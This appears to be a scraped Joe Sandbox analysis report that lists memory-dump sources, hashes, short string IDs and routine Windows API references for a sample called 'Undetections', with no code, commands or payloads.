• Opcode ID: 99f4528fbc5cb9082b15b74d059e91ce0e671fec55dd557eebbc1b64e3b4544d
• Instruction ID: 5b71ac889b70a810886c5ff902d3981e321ae08aa543d72f2e23742b03c46004
• Opcode Fuzzy Hash: 99f4528fbc5cb9082b15b74d059e91ce0e671fec55dd557eebbc1b64e3b4544d
• Instruction Fuzzy Hash: 8791B0B1F002199FDB54DF79C854AAFBBF6EF88300B108529E905EB741DB35A905CB90
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
Similarity
• API ID:
• String ID: (oq$(oq
• API String ID: 0-3207256227
• Opcode ID: 4a4175894040c7872e10914c20abe348ed697243b806b2e8c52d3bae10d13a38
• Instruction ID: 3d4b4649e91b822083ad9ccb7d0714a3f1ea5b6d356f213e35c1cedc6cb94e01
• Opcode Fuzzy Hash: 4a4175894040c7872e10914c20abe348ed697243b806b2e8c52d3bae10d13a38
• Instruction Fuzzy Hash: FE320935D002199FCF11DFA4DC50AEDBBB6FF55300F5192AAE51967260EB30AA99CF80
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'kq$poq
                                                                                                                                                                                                            • API String ID: 0-937253537
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: fff?
                                                                                                                                                                                                            • API String ID: 0-4136771917
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00C2FD96
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00C2FDD3
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00C2FE10
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C2FE69
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 2063062207-1343716551
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq$Hoq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3931962165
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hoq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3106737575
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hoq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3106737575
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: N$n
                                                                                                                                                                                                            • API String ID: 0-3735540769
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3084834809
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $kq$$kq
                                                                                                                                                                                                            • API String ID: 0-3550614674
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA46C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA46C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C27AC1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04EA6C31
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C27AC1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0794BEBA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 0794EF14
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClassInfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3534257612-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07037D6F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108773320.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7030000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07037D6F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108773320.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7030000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 0794EF14
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClassInfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3534257612-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 0F0FCDF8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePeek
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2222842502-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C2E031,00000800,00000000,00000000), ref: 00C2E242
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0794BEBA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 0F0FCDF8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePeek
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2222842502-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0F0F7A35
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0F0F6BFD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0F0F6BFD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0F0FE12D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

